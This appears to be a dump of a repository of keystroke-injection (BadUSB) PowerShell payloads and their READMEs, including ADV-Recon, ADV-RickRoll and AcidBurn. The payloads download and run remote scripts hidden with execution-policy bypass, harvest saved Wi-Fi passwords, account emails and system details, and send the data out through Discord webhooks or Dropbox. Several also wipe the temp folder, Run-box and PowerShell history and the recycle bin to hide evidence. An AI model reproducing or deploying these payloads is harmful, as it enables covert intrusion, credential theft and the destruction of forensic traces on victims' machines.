ConvertTo-Json)};\r\n\r\nif (-not ([string]::IsNullOrEmpty($file))){curl.exe -F \"file1=@$file\" $hookurl}\r\n}\r\n\r\nif (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file \"$env:tmp/$ZIP\"}\r\n\r\n \r\n\r\n############################################################################################################################################################\r\n\r\n<#\r\n.NOTES \r\n\tThis is to clean up behind you and remove any evidence to prove you were there\r\n#>\r\n\r\n# Delete contents of Temp folder \r\n\r\nrm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\r\n\r\n# Delete run box history\r\n\r\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f\r\n\r\n# Delete powershell history\r\n\r\nRemove-Item (Get-PSreadlineOption).HistorySavePath\r\n\r\n# Deletes contents of recycle bin\r\n\r\nClear-RecycleBin -Force -ErrorAction SilentlyContinue\r\n\r\n\t\t\r\n############################################################################################################################################################\r\n\r\n# Popup message to signal the payload is done\r\n\r\n$done = New-Object -ComObject Wscript.Shell;$done.Popup(\"Update Completed\",1)\r\n" }, { "path": "Payloads/Flip-ADV-Recon/ADV-Recon.txt", "content": "REM Title: ADV-Recon\n\nREM Author: I am Jakoby\n\nREM Description: This payload is meant to do an advanced recon of the target's PC. See README.md file for more details.\n\nREM Target: Windows 10, 11\n\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/9nb | iex\nENTER\n" }, { "path": "Payloads/Flip-ADV-Recon/README.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# ADV-Recon\n\nA script used to do an advanced level of recon on the target's computer.\n\nVersion 2 no longer requires you to host your own version of the script.\n\nModifying the execution script is the only necessary interaction.\n\n## Description\n\nThis program enumerates a target PC to collect as much recon data as possible for future engagements. This includes:\n\n* Hosts PowerShell Version (to know what commands can be run)\n* Name associated with their Microsoft account (Or ENV UserName variable if one is not detected)\n* Whether they are in the Admin group or not\n* The email associated with their Microsoft account (for phishing possibilities)\n* Other User accounts on their system (for possible privilege escalation)\n* Details on their login settings (Ex: Min/Max password age and length)\n* How many days since they have changed their password (Max password age - Days since = Opportunity)\n* Their GeoLocation (know their approximate where abouts)\n* Nearby Wifi Networks (Possible lateral movement)\n* Network Info (Local and Public IP Address; MAC Address; RDP Enabled?)\n* WLAN Profiles (List of SSIDs and Passwords stored on their PC)\n* Network Interfaces (What are they connecting in and out with)\n* System Information (Manufacturer, Model, Serial Number, OS, CPU, RAM, Mainboard BIOS)\n* Local Users (Accounts on system with Username, name associated with microsoft account and SID)\n* Information on their hard drives (Indicator of Recon Scope)\n* COM and Serial Devices (Is there a device connected you can manipulate?)\n* Active TCP Connections (Poor mans Port Scanning)\n* Processes, Services, Software, and Drivers (What is running on the computer we can exploit?)\n* Video Card info (how much vroom vroom?)\n* Tree Command (Gain a more accurate assessment of what to exfil or use in Phishing attacks)\n\n## Getting Started\n\n### Dependencies\n\n* Dropbox or Discord\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n\n`$dc` is the variable that stores your discord webhook \n\n`$db` is the variable that stores your dropbox token \n\nFill in either or both of these two methods to exfil your collected data\n\n```\npowershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/9nb | iex\n```\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n* 0.2\n * Added additional data queries\n * Optimized output of data\n\n

(back to top)

\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n" }, { "path": "Payloads/Flip-ADV-RickRoll/ADV-RickRoll.txt", "content": "REM Title: ADV-RickRoll\r\n\r\nREM Author: I am Jakoby\r\n\r\nREM Description: This is a one liner payload that will Rick Roll your target. Video will be played at full screen and max volume. \r\nREM Upon deployment, payload will pause until a mouse movement is detected and run once one is. \r\n\r\nREM Target: Windows 10, 11\r\n\r\nREM --------------------------------------------------------------------------------------\r\nREM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.\r\nREM --------------------------------------------------------------------------------------\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -Ep Bypass $D=\"$env:tmp\";irm -Uri 'https://jakoby.lol/qee' -O \"$D\\rr.zip\";Expand-Archive \"$D\\rr.zip\" -Des $D\\rr -Force;. \"$D\\rr\\rr.ps1\"\r\nENTER\r\n" }, { "path": "Payloads/Flip-ADV-RickRoll/ReadMe.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n \n\n

\n \n \n \n

\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# ADV-RickRoll\n\nA script used to do an advanced rick roll on your target.\n\n## Description\n\nThis program Rick Rolls your target without opening a muted youtube video.\nA Rick Roll video is downloaded and played in your powershell console when a mouse movement is detected.\n\n## Getting Started\n\n### Dependencies\n\n* An internet connection\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload\n```\npowershell -w h -NoP -NonI -Ep Bypass $D=\"$env:tmp\";irm -Uri 'https://jakoby.lol/qee' -O \"$D\\rr.zip\";Expand-Archive \"$D\\rr.zip\" -Des $D\\rr -Force;. \"$D\\rr\\rr.ps1\"\n```\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n\n

\n \"Github\n

\n" }, { "path": "Payloads/Flip-ADV-RickRoll/StageOne.txt", "content": "$i = '[DllImport(\"user32.dll\")] public static extern bool ShowWindow(int handle, int state);';\nadd-type -name win -member $i -namespace native;\n[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);\n\ncd \"$env:tmp\";irm -Uri 'https://jakoby.lol/qee' -O \"rr.zip\";Expand-Archive \"rr.zip\" -Force; .\\rr.ps1\n" }, { "path": "Payloads/Flip-ADV-RickRoll/rr.ps1", "content": "function Target-Comes {\r\nAdd-Type -AssemblyName System.Windows.Forms\r\n$originalPOS = [System.Windows.Forms.Cursor]::Position.X\r\n$o=New-Object -ComObject WScript.Shell\r\n\r\n while (1) {\r\n $pauseTime = 3\r\n if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){\r\n break\r\n }\r\n else {\r\n $o.SendKeys(\"{CAPSLOCK}\");Start-Sleep -Seconds $pauseTime\r\n }\r\n }\r\n}\r\n\r\n#############################################################################################################################################\r\n\r\n\r\n#WPF Library for Playing Movie and some components\r\nAdd-Type -AssemblyName PresentationFramework\r\n\r\nAdd-Type -AssemblyName System.ComponentModel\r\n#XAML File of WPF as windows for playing movie\r\n\r\n[xml]$XAML = @\"\r\n \r\n\r\n \r\n\r\n\"@\r\n \r\n#Movie Path\r\n[uri]$VideoSource = \"$env:TMP\\rr.mp4\"\r\n \r\n#Devide All Objects on XAML\r\n$XAMLReader=(New-Object System.Xml.XmlNodeReader $XAML)\r\n$Window=[Windows.Markup.XamlReader]::Load( $XAMLReader )\r\n$VideoPlayer = $Window.FindName(\"VideoPlayer\")\r\n\r\n \r\n#Video Default Setting\r\n$VideoPlayer.Volume = 100;\r\n$VideoPlayer.Source = $VideoSource;\r\n#$VideoPlayer.Padding = new Thickness(5);\r\n\r\n\r\nTarget-Comes\r\n\r\n$VideoPlayer.Play()\r\n \r\n#Show Up the Window \r\n$Window.ShowDialog() | out-null\r\n\r\n\r\n# Turn of capslock if it is left on\r\n\r\n$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')\r\nif ($caps -eq $true){$key = New-Object -ComObject WScript.Shell;$key.SendKeys('{CapsLock}')}\r\n\r\n\r\n# empty temp folder\r\nrm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\r\n\r\n# delete run box history\r\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f\r\n\r\n# Delete powershell history\r\nRemove-Item (Get-PSreadlineOption).HistorySavePath\r\n\r\n# Empty recycle bin\r\nClear-RecycleBin -Force -ErrorAction SilentlyContinue" }, { "path": "Payloads/Flip-AcidBurn/AcidBurn.ps1", "content": "############################################################################################################################################################ \n# | ___ _ _ _ # ,d88b.d88b # \n# Title : AcidBurn | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # \n# Author : I am Jakoby | | | / _` | | '_ ` _ \\ _ | | / _` | | |/ / / _ \\ | '_ \\ | | | |# `Y8888888Y' # \n# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #\n# Category : Prank | |___| \\__,_| |_| |_| |_| \\___/ \\__,_| |_|\\_\\ \\___/ |_.__/ \\__, |# `Y' #\n# Target : Windows 7,10,11 | |___/ # /\\/|_ __/\\\\ # \n# Mode : HID | |\\__/,| (`\\ # / -\\ /- ~\\ # \n# | My crime is that of curiosity |_ _ |.--.) )# \\ = Y =T_ = / # \n# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \\ Hobo # \n# | but satisfaction brought him back (((^_(((/(((_/ # / \\ / \\ # \n#__________________________________|_________________________________________________________________________# | | ) ~ ( #\n# tiktok.com/@i_am_jakoby # / \\ / ~ \\ #\n# github.com/I-Am-Jakoby # \\ / \\~ ~/ # \n# twitter.com/I_Am_Jakoby # /\\_/\\_/\\__ _/_/\\_/\\__~__/_/\\_/\\_/\\_/\\_/\\_# \n# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# \n# youtube.com/c/IamJakoby (youtube link with demonstration coming soon) # | | | |( ( | | | \\\\ | | | | | |#\n############################################################################################################################################################\n\n<#\n.NOTES\n\tThis script was not optimized to shorten the code. This script is intended to have as much readability as possible for new coders to learn.\n\n.DESCRIPTION \n\tThis program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.\n\tThe SSID and WiFi password of any current or previously connected to networks.\n\tIt determines the last day they changed their password and how many days ago.\n\tOnce the information is gathered the script will pause until a mouse movement is detected\n\tThen the script uses Sapi speak to roast their set up and lack of security\n#>\n############################################################################################################################################################\n\n# Variables\n\n\n$s=New-Object -ComObject SAPI.SpVoice\n\n############################################################################################################################################################\n\n# Intro ---------------------------------------------------------------------------------------------------\n function Get-fullName {\n\n try {\n\n $fullName = Net User $Env:username | Select-String -Pattern \"Full Name\";$fullName = (\"$fullName\").TrimStart(\"Full Name\")\n\n }\n \n # If no name is detected function will return $env:UserName \n\n # Write Error is just for troubleshooting \n catch {Write-Error \"No name was detected\" \n return $env:UserName\n -ErrorAction SilentlyContinue\n }\n\n return $fullName \n\n}\n\n$fullName = Get-fullName\n\n# echo statement used to track progress while debugging\necho \"Intro Done\"\n\n###########################################################################################################\n\n<#\n\n.NOTES \n\tRAM Info\n\tThis will get the amount of RAM the target computer has\n#>\n\n\nfunction Get-RAM {\n\n try {\n\n $OS = (Get-WmiObject Win32_OperatingSystem).Name;$OSpos = $OS.IndexOf(\"|\");$OS = $OS.Substring(0, $OSpos)\n\n $RAM=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { \"{0:N1}\" -f ($_.sum / 1GB)}\n $RAMpos = $RAM.IndexOf('.')\n $RAM = [int]$RAM.Substring(0,$RAMpos).Trim()\n\n# ENTER YOUR CUSTOM RESPONSES HERE\n#----------------------------------------------------------------------------------------------------\n $lowRAM = \"$RAM gigs of ram? might as well use pen and paper\"\n \n $okRAM = \"$RAM gigs of ram really? I have a calculator with more computing power\"\n \n $goodRAM = \"$RAM gigs of ram? Can almost guarantee you have a light up keyboard.. you are a wanna be streamer huh?\"\n\n $impressiveRAM = \"$RAM gigs of ram? are you serious? a super computer with no security that is funny right there\"\n#----------------------------------------------------------------------------------------------------\n\n if($RAM -le 4){\n return $lowRAM\n } elseif($RAM -ge 5 -and $RAM -le 12){\n return $okRAM\n } elseif($RAM -ge 13 -and $RAM -le 24){\n return $goodRAM\n } else {\n return $impressiveRAM\n }\n\n }\n \n # If one of the above parameters is not detected function will return $null to avoid sapi speak\n\n # Write Error is just for troubleshooting \n catch {Write-Error \"Error in search\" \n return $null\n -ErrorAction SilentlyContinue\n }\n}\n\n# echo statement used to track progress while debugging\necho \"RAM Info Done\"\n\n###########################################################################################################\n\n<#\n\n.NOTES \n\tPublic IP \n\tThis will get the public IP from the target computer\n#>\n\n\nfunction Get-PubIP {\n\n try {\n\n $computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content\n\n }\n \n # If no Public IP is detected function will return $null to avoid sapi speak\n\n # Write Error is just for troubleshooting \n catch {Write-Error \"No Public IP was detected\" \n return $null\n -ErrorAction SilentlyContinue\n }\n\n return \"your public I P address is $computerPubIP\"\n}\n\n# echo statement used to track progress while debugging\necho \"Pub IP Done\"\n\n###########################################################################################################\n\n<#\n\n.NOTES \n\tWifi Network and Password\n\tThis function will custom a tailor response based on how many characters long their password is\n#>\n\n\nfunction Get-Pass {\n\n #-----VARIABLES-----#\n # $pwl = their Pass Word Length\n # $pass = their Password \n\n try {\n\n $pro = netsh wlan show interface | Select-String -Pattern ' SSID '; $pro = [string]$pro\n $pos = $pro.IndexOf(':')\n $pro = $pro.Substring($pos+2).Trim()\n\n $pass = netsh wlan show profile $pro key=clear | Select-String -Pattern 'Key Content'; $pass = [string]$pass\n $passPOS = $pass.IndexOf(':')\n $pass = $pass.Substring($passPOS+2).Trim()\n \n if($pro -like '*_5GHz*') {\n $pro = $pro.Trimend('_5GHz')\n } \n\n $pwl = $pass.length\n\n\n }\n \n # If no network is detected function will return $null to avoid sapi speak\n \n # Write Error is just for troubleshooting\n catch {Write-Error \"No network was detected\" \n return $null\n -ErrorAction SilentlyContinue\n }\n\n\n# ENTER YOUR CUSTOM RESPONSES HERE\n#----------------------------------------------------------------------------------------------------\n $badPASS = \"$pro is not a very creative name but at least it is not as bad as your wifi password... only $pwl characters long? $pass ...? really..? $pass was the best you could come up with?\"\n \n $okPASS = \"$pro is not a very creative name but at least you are trying a little bit, your password is $pwl characters long, still trash though.. $pass ...? You can do better\"\n \n $goodPASS = \"$pro is not a very creative name but At least you are not a total fool... $pwl character long password actually is not bad, but it did not save you from me did it? no..it..did..not! $pass is a decent password though.\"\n#----------------------------------------------------------------------------------------------------\n\n if($pass.length -lt 8) { return $badPASS\n\n }elseif($pass.length -gt 7 -and $pass.length -lt 12) { return $okPASS\n\n }else { return $goodPASS\n\n }\n}\n\n# echo statement used to track progress while debugging\necho \"Wifi pass Done\"\n\n###########################################################################################################\n\n<#\n\n.NOTES \n\tAll Wifi Networks and Passwords \n\tThis function will gather all current Networks and Passwords saved on the target computer\n\tThey will be save in the temp directory to a file named with \"$env:USERNAME-$(get-date -f yyyy-MM-dd)_WiFi-PWD.txt\"\n#>\n\nFunction Get-Networks {\n# Get Network Interfaces\n$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress \n\n# Get Wifi SSIDs and Passwords\t\n$WLANProfileNames =@()\n\n#Get all the WLAN profile names\n$Output = netsh.exe wlan show profiles | Select-String -pattern \" : \"\n\n#Trim the output to receive only the name\nForeach($WLANProfileName in $Output){\n $WLANProfileNames += (($WLANProfileName -split \":\")[1]).Trim()\n}\n$WLANProfileObjects =@()\n\n#Bind the WLAN profile names and also the password to a custom object\nForeach($WLANProfileName in $WLANProfileNames){\n\n #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user\n try{\n $WLANProfilePassword = (((netsh.exe wlan show profiles name=\"$WLANProfileName\" key=clear | select-string -Pattern \"Key Content\") -split \":\")[1]).Trim()\n }Catch{\n $WLANProfilePassword = \"The password is not stored in this profile\"\n }\n\n #Build the object and add this to an array\n $WLANProfileObject = New-Object PSCustomobject \n $WLANProfileObject | Add-Member -Type NoteProperty -Name \"ProfileName\" -Value $WLANProfileName\n $WLANProfileObject | Add-Member -Type NoteProperty -Name \"ProfilePassword\" -Value $WLANProfilePassword\n $WLANProfileObjects += $WLANProfileObject\n Remove-Variable WLANProfileObject\n\treturn $WLANProfileObjects\n}\n}\n\n$Networks = Get-Networks\n\nAdd-Type @\"\nusing System;\nusing System.Runtime.InteropServices;\npublic class PInvoke {\n [DllImport(\"user32.dll\")] public static extern IntPtr GetDC(IntPtr hwnd);\n [DllImport(\"gdi32.dll\")] public static extern int GetDeviceCaps(IntPtr hdc, int nIndex);\n}\n\"@\n$hdc = [PInvoke]::GetDC([IntPtr]::Zero)\n$w = [PInvoke]::GetDeviceCaps($hdc, 118) # width\n$h = [PInvoke]::GetDeviceCaps($hdc, 117) # height\n\n<#\n\n.NOTES \n\tThis will take the image you generated and set it as the targets wall paper\n#>\n\nFunction Set-WallPaper {\n \n<#\n \n .SYNOPSIS\n Applies a specified wallpaper to the current user's desktop\n \n .PARAMETER Image\n Provide the exact path to the image\n \n .PARAMETER Style\n Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span)\n \n .EXAMPLE\n Set-WallPaper -Image \"C:\\Wallpaper\\Default.jpg\"\n Set-WallPaper -Image \"C:\\Wallpaper\\Background.jpg\" -Style Fit\n \n#>\n\n \nparam (\n [parameter(Mandatory=$True)]\n # Provide path to image\n [string]$Image,\n # Provide wallpaper style that you would like applied\n [parameter(Mandatory=$False)]\n [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]\n [string]$Style\n)\n \n$WallpaperStyle = Switch ($Style) {\n \n \"Fill\" {\"10\"}\n \"Fit\" {\"6\"}\n \"Stretch\" {\"2\"}\n \"Tile\" {\"0\"}\n \"Center\" {\"0\"}\n \"Span\" {\"22\"}\n \n}\n \nIf($Style -eq \"Tile\") {\n \n New-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force\n New-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name TileWallpaper -PropertyType String -Value 1 -Force\n \n}\nElse {\n \n New-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force\n New-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name TileWallpaper -PropertyType String -Value 0 -Force\n \n}\n \nAdd-Type -TypeDefinition @\" \nusing System; \nusing System.Runtime.InteropServices;\n \npublic class Params\n{ \n [DllImport(\"User32.dll\",CharSet=CharSet.Unicode)] \n public static extern int SystemParametersInfo (Int32 uAction, \n Int32 uParam, \n String lpvParam, \n Int32 fuWinIni);\n}\n\"@ \n \n $SPI_SETDESKWALLPAPER = 0x0014\n $UpdateIniFile = 0x01\n $SendChangeEvent = 0x02\n \n $fWinIni = $UpdateIniFile -bor $SendChangeEvent\n \n $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)\n}\n\n#############################################################################################################################################\n\nFunction WallPaper-Troll {\n\nif (!$Networks) { Write-Host \"variable is null\" \n}else { \n\n\t# This is the name of the file the networks and passwords are saved \n\n\t$FileName = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_WiFi-PWD.txt\"\n\n\t($Networks| Out-String) >> $Env:temp\\$FileName\n\n\t$content = [IO.File]::ReadAllText(\"$Env:temp\\$FileName\")\n\n\n# this is the message that will be coded into the image you use as the wallpaper\n\n\t$hiddenMessage = \"`n`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back `n with love -Jakoby\"\n\n# this will be the name of the image you use as the wallpaper\n\n\t$ImageName = \"dont-be-suspicious\"\n\n<#\n\n.NOTES \n\tThis will get take the information gathered and format it into a .jpg\n#>\n\n\tAdd-Type -AssemblyName System.Drawing\n\n\t$filename = \"$env:tmp\\foo.jpg\" \n\t$bmp = new-object System.Drawing.Bitmap $w,$h \n\t$font = new-object System.Drawing.Font Consolas,18 \n\t$brushBg = [System.Drawing.Brushes]::White \n\t$brushFg = [System.Drawing.Brushes]::Black \n\t$graphics = [System.Drawing.Graphics]::FromImage($bmp) \n\t$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height) \n\t$graphics.DrawString($content,$font,$brushFg,500,100) \n\t$graphics.Dispose() \n\t$bmp.Save($filename) \n\n# Invoke-Item $filename \n\n<#\n\n.NOTES \n\tThis will take your hidden message and use steganography to hide it in the image you use as the wallpaper \n\tThen it will clean up the files you don't want to leave behind\n#>\n\n\techo $hiddenMessage > $Env:temp\\foo.txt\n\tcmd.exe /c copy /b \"$Env:temp\\foo.jpg\" + \"$Env:temp\\foo.txt\" \"$Env:USERPROFILE\\Desktop\\$ImageName.jpg\"\n\n\trm $env:TEMP\\foo.txt,$env:TEMP\\foo.jpg -r -Force -ErrorAction SilentlyContinue\n\n\n#############################################################################################################################################\n\n\n# This will open up notepad with all their saved networks and passwords and taunt them\n\n\n\t$s.Speak(\"wanna see something really cool?\")\n\tSet-WallPaper -Image \"$Env:USERPROFILE\\Desktop\\$ImageName.jpg\" -Style Center\n\t$s.Speak(\"Look at all your other passswords I got..\")\n\tStart-Sleep -Seconds 1\n\t$s.Speak(\"These are the wifi passwords for every network you've ever connected to!\")\n\tStart-Sleep -Seconds 1\n\t$s.Speak(\"I could send them to myself but i wont\")\n\n}\n\n# echo statement used to track progress while debugging\necho \"All Wifi Passes Done\"\n}\n\n\n###########################################################################################################\n\n<#\n\n.NOTES \n\tPassword last Set\n\tThis function will custom tailor a response based on how long it has been since they last changed their password\n#>\n\n\n function Get-Days_Set {\n\n #-----VARIABLES-----#\n # $pls (password last set) = the date/time their password was last changed \n # $days = the number of days since their password was last changed \n\n try {\n \n $pls = net user $env:UserName | Select-String -Pattern \"Password last\" ; $pls = [string]$pls\n $plsPOS = $pls.IndexOf(\"e\")\n $pls = $pls.Substring($plsPOS+2).Trim()\n $pls = $pls -replace \".{3}$\"\n $time = ((get-date) - (get-date \"$pls\")) ; $time = [string]$time \n $DateArray =$time.Split(\".\")\n $days = [int]$DateArray[0]\n }\n \n # If no password set date is detected function will return $null to cancel Sapi Speak\n\n # Write Error is just for troubleshooting \n catch {Write-Error \"Day password set not found\" \n return $null\n -ErrorAction SilentlyContinue\n }\n\n\n# ENTER YOUR CUSTOM RESPONSES HERE \n#---------------------------------------------------------------------------------------------------- \n $newPass = \"$pls was the last time you changed your password... You changed your password $days days ago.. I have to applaud you.. at least you change your password often. Still did not stop me! \"\n \n $avgPASS = \"$pls was the last time you changed your password... it has been $days days since you changed your password, really starting to push it, i mean look i am here. that tells you something \" \n \n $oldPASS = \"$pls was the last time you changed your password... it has been $days days since you changed your password, you were basically begging me to hack you, well here i am! \"\n#---------------------------------------------------------------------------------------------------- \n \n if($days -lt 45) { return $newPass\n\n }elseif($days -gt 44 -and $days -lt 182) { return $avgPASS\n\n }else { return $oldPASS\n\n }\n}\n\n# echo statement used to track progress while debugging\necho \"Pass last set Done\"\n\n###########################################################################################################\n\n<#\n\n.NOTES \n\tGet Email\n\tThis function will custom tailor a response based on what type of email the target has\n#>\n\nfunction Get-email {\n \n try {\n\n $email = GPRESULT -Z /USER $Env:username | Select-String -Pattern \"([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})\" -AllMatches;$email = (\"$email\").Trim()\n \n $emailpos = $email.IndexOf(\"@\")\n \n $domain = $email.Substring($emailpos+1) #.TrimEnd(\".com\")\n\n }\n\n# If no email is detected function will return backup message for sapi speak\n\n # Write Error is just for troubleshooting\n catch {Write-Error \"An email was not found\" \n return \"you're lucky you do not have your email connected to your account, I would have really had some fun with you then lol\"\n -ErrorAction SilentlyContinue\n }\n \n# ENTER YOUR CUSTOM RESPONSES HERE\n#----------------------------------------------------------------------------------------------------\n $gmailResponse = \"At least you use G Mail.. we should be friends. If you are down just email me back, ill message you at $email. That is your email right?\"\n $yahooResponse = \"a yahoo account seriously? you are either in your 50's or just got done doing some time, a lot of it.. $email .. this is sad\"\n $hotmailResponse = \"really?. you have a hotmail account? $email .. I am sending this to the f b I they need to check your hard drive\"\n $otherEmailResponse = \"I dead ass do not even know what this is.. $email .. hope you did not think it was safe\"\n#----------------------------------------------------------------------------------------------------\n\n if($email -like '*gmail*') { return $gmailResponse\n\n }elseif($email -like '*yahoo*') { return $yahooResponse\n\n }elseif($email -like '*hotmail*') { return $hotmailResponse\n \n }else { return $otherEmailResponse}\n\n\n}\n\n# echo statement used to track progress while debugging\necho \"Email Done\"\n\n###########################################################################################################\n\n<#\n\n.NOTES \n\tMessages\n\tThis function will run all the previous functions and assign their outputs to variables\n#>\n\n$intro = \"$fullName , it has been a long time my friend\"\n\n$RAMwarn = Get-RAM \n\n$PUB_IPwarn = Get-PubIP \n\n$PASSwarn = Get-Pass\n\n$LAST_PASSwarn = Get-Days_Set\n\n$EMAILwarn = Get-email \n\n$OUTRO = \"My crime is that of curiosity.... \tand yea curiosity killed the cat.... but satisfaction brought him back.... later $fullName\"\n\n# echo statement used to track progress while debugging\necho \"Speak Variables set\"\n\n###########################################################################################################\n\n# This turns the volume up to max level--------------------------------------------------------------------\n\n#$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}\n\n# echo statement used to track progress while debugging\necho \"Volume to max level\"\n\n###########################################################################################################\n\n<#\n\n.NOTES \n\tThese two snippets are meant to be used as indicators to let you know the script is set up and ready\n\tThis will display a pop up window saying \"hello $fullname\"\n\tOr this makes the CapsLock indicator light blink however many times you set it to\n\tif you do not want the ready notice to pop up or the CapsLock light to blink comment them out below\n#>\n\n# a popup will be displayed before freezing the script while waiting for the cursor to move to continue the script\n# else capslock light will blink as an indicator\n$popmessage = \"Hello $fullName\"\n\n\n$readyNotice = New-Object -ComObject Wscript.Shell;$readyNotice.Popup($popmessage)\n\n\n# caps lock indicator light\n$blinks = 3;$o=New-Object -ComObject WScript.Shell;for ($num = 1 ; $num -le $blinks*2; $num++){$o.SendKeys(\"{CAPSLOCK}\");Start-Sleep -Milliseconds 250}\n\n\n\n#-----------------------------------------------------------------------------------------------------------\n\n<#\n\n.NOTES \n\tThen the script will be paused until the mouse is moved \n\tscript will check mouse position every indicated number of seconds\n\tThis while loop will constantly check if the mouse has been moved \n\t\"CAPSLOCK\" will be continuously pressed to prevent screen from turning off\n\tit will then sleep for the indicated number of seconds and check again\n\twhen mouse is moved it will break out of the loop and continue the script\n#>\n\n\nAdd-Type -AssemblyName System.Windows.Forms\n$originalPOS = [System.Windows.Forms.Cursor]::Position.X\n\n while (1) {\n $pauseTime = 3\n if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){\n break\n }\n else {\n $o.SendKeys(\"{CAPSLOCK}\");Start-Sleep -Seconds $pauseTime\n }\n }\necho \"it worked\"\n\n###########################################################################################################\n\n# this is where your message is spoken line by line\n\n$s=New-Object -ComObject SAPI.SpVoice\n\n# This sets how fast Sapi Speaks\n\n$s.Rate = -1\n\n$s.Speak($intro)\n\n$s.Speak($RAMwarn)\n\n$s.Speak($PUB_IPwarn)\n\n$s.Speak($PASSwarn)\n\nWallPaper-Troll\n\n$s.Speak($LAST_PASSwarn)\n\n$s.Speak($EMAILwarn)\n\n$s.Speak($OUTRO)\n\n###########################################################################################################\n\n# this snippet will leave a message on your targets desktop \n\n$message = \"`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back\"\n\nAdd-Content $home\\Desktop\\WithLove.txt $message\n###########################################################################################################\n\n<#\n\n.NOTES \n\tThis is to clean up behind you and remove any evidence to prove you were there\n#>\n\n# Delete contents of Temp folder \n\nrm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\n\n# Delete run box history\n\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f\n\n# Delete powershell history\n\nRemove-Item 